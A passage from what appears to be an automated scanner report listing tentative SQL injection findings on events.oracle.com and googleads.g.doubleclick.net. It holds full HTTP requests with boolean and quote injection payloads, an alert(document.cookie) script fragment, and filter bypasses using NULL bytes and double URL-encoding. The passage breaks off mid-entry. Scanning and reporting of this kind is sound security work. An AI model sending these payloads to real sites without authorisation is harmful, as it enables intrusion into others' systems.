</tbody>
</table></td>
<td width="60">&nbsp;</td>
<td colspan="2" align="left" valign="top" width="100%">
<table border="0" width="400" summary="resultDetail5">
<tbody>
<tr>
<td colspan="5" width="100%" style="padding-bottom: 10px;" align="left">
<strong>
<a onclick="window.open('http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=36&amp;pcode=LADPN10014049MPP040','Headlines_Result','height=480,width=640,resizable=yes,location=yes,scrollbars=yes,status=yes,toolbar=yes,menubar=yes,addressbar=yes');return false;" href="http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=36&amp;pcode=LADPN10014049MPP040"><b>OPN</b> R12.1 Oracle SCM Essentials Implementation Boot Camp Ed 1 (D64622GC10) - Oracle
</a>
</strong>




<div style="padding-top: 7px; font-size: 11px; display: none; padding-right: 10px;" id="table_5"><wbr>

                A Boot Camp ofnOPN R12.1 Oracle SCM Essentials Implementation taking place in Rio de Janeiro. Save the date and join us!
<br><br>In Progress until March 26<br>
    </div>
</td>

</tr>
<tr>

<td style="width: 5em; cursor: pointer; font-weight: bold; color: red; p
...[SNIP]...

Request 2

GET /search/search?group=Events&keyword=OPN+Only&9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e=1'%20and%201%3d2--%20 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (M;max-age=900+0;age=1;ecid=309471481082,0)
Date: Fri, 18 Mar 2011 15:36:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176935


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-e
...[SNIP]...
<i>Sao Paulo</i> </td>
</tr>
</tbody>
</table></td>
<td width="60">&nbsp;</td>
<td colspan="2" align="left" valign="top" width="100%">
<table border="0" width="400" summary="resultDetail5">
<tbody>
<tr>
<td colspan="5" width="100%" style="padding-bottom: 10px;" align="left">
<strong>
<a onclick="window.open('http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=31&amp;pcode=LADPN10014049MPP035','Headlines_Result','height=480,width=640,resizable=yes,location=yes,scrollbars=yes,status=yes,toolbar=yes,menubar=yes,addressbar=yes');return false;" href="http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=31&amp;pcode=LADPN10014049MPP035"><b>OPN</b> Hyperion Planning 11.1.1 Implementation Boot Camp Ed 1 (D64290GC10) - Oracle
</a>
</strong>




<div style="padding-top: 7px; font-size: 11px; display: none; padding-right: 10px;" id="table_5"><wbr>

                A Boot Camp on Hyperion Planning 11.1.1 Implementation for partners in São Paulo. Save the date and join us!
<br><br>In Progress until March 18<br>
    </div>
</td>

</tr>
<tr>

<td style="width: 5em; cursor: pointer; font-weight: bold; color: red; padding-top: 15px; p
...[SNIP]...

1.10. http://events.oracle.com/search/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /search/search?group=Events&keyword=OPN+Only&9f0e2%22-alert(document.cookie&1%20and%201%3d1--%20=1 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (M;max-age=900+0;age=1;ecid=163442632397,0)
Date: Fri, 18 Mar 2011 15:37:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-e
...[SNIP]...
<i>Sao Paulo</i> </td>
</tr>
</tbody>
</table></td>
<td width="60">&nbsp;</td>
<td colspan="2" align="left" valign="top" width="100%">
<table border="0" width="400" summary="resultDetail5">
<tbody>
<tr>
<td colspan="5" width="100%" style="padding-bottom: 10px;" align="left">
<strong>
<a onclick="window.open('http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=31&amp;pcode=LADPN10014049MPP035','Headlines_Result','height=480,width=640,resizable=yes,location=yes,scrollbars=yes,status=yes,toolbar=yes,menubar=yes,addressbar=yes');return false;" href="http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=31&amp;pcode=LADPN10014049MPP035"><b>OPN</b> Hyperion Planning 11.1.1 Implementation Boot Camp Ed 1 (D64290GC10) - Oracle
</a>
</strong>




<div style="padding-top: 7px; font-size: 11px; display: none; padding-right: 10px;" id="table_5"><wbr>

                A Boot Camp on Hyperion Planning 11.1.1 Implementation for partners in São Paulo. Save the date and join us!
<br><br>In Progress until March 18<br>
    </div>
</td>

</tr>
<tr>

<td style="width: 5em; cursor: pointer; font-weight: bold; color: red; padding-top: 15px; p
...[SNIP]...

Request 2

GET /search/search?group=Events&keyword=OPN+Only&9f0e2%22-alert(document.cookie&1%20and%201%3d2--%20=1 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (M;max-age=900+0;age=0;ecid=167737601348,0)
Date: Fri, 18 Mar 2011 15:37:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177053


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-e
...[SNIP]...
<i>Rio De Janeiro</i> </td>
</tr>
</tbody>
</table></td>
<td width="60">&nbsp;</td>
<td colspan="2" align="left" valign="top" width="100%">
<table border="0" width="400" summary="resultDetail5">
<tbody>
<tr>
<td colspan="5" width="100%" style="padding-bottom: 10px;" align="left">
<strong>
<a onclick="window.open('http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=36&amp;pcode=LADPN10014049MPP040','Headlines_Result','height=480,width=640,resizable=yes,location=yes,scrollbars=yes,status=yes,toolbar=yes,menubar=yes,addressbar=yes');return false;" href="http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=36&amp;pcode=LADPN10014049MPP040"><b>OPN</b> R12.1 Oracle SCM Essentials Implementation Boot Camp Ed 1 (D64622GC10) - Oracle
</a>
</strong>




<div style="padding-top: 7px; font-size: 11px; display: none; padding-right: 10px;" id="table_5"><wbr>

                A Boot Camp ofnOPN R12.1 Oracle SCM Essentials Implementation taking place in Rio de Janeiro. Save the date and join us!
<br><br>In Progress until March 26<br>
    </div>
</td>

</tr>
<tr>

<td style="width: 5em; cursor: pointer; font-weight: bold; color: red; p
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [flash parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The flash parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the flash parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154%00'&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:09:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11422
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154%00''&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:09:13 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4434
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.12. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60%2527&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:05:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4436
X-XSS-Protection: 1; mode=block

<html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,load:g}
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60%2527%2527&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:06:00 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4432
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.13. http://googleads.g.doubleclick.net/pagead/ads [id cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb%2527; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 25-Mar-2011 17:35:04 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:20:04 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 6446
X-XSS-Protection: 1; mode=block
Expires: Fri, 25 Mar 2011 17:20:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb%2527%2527; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 25-Mar-2011 17:35:05 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:20:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 9636
X-XSS-Protection: 1; mode=block
Expires: Fri, 25 Mar 2011 17:20:05 GMT

<style>body{margin:0;padding:0}</style><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:468px"><div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><
...[SNIP]...

1.14. http://googleads.g.doubleclick.net/pagead/ads [output parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html%2527&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:05:49 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11320
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html%2527%2527&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:05:50 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4436
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.15. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The shv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the shv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

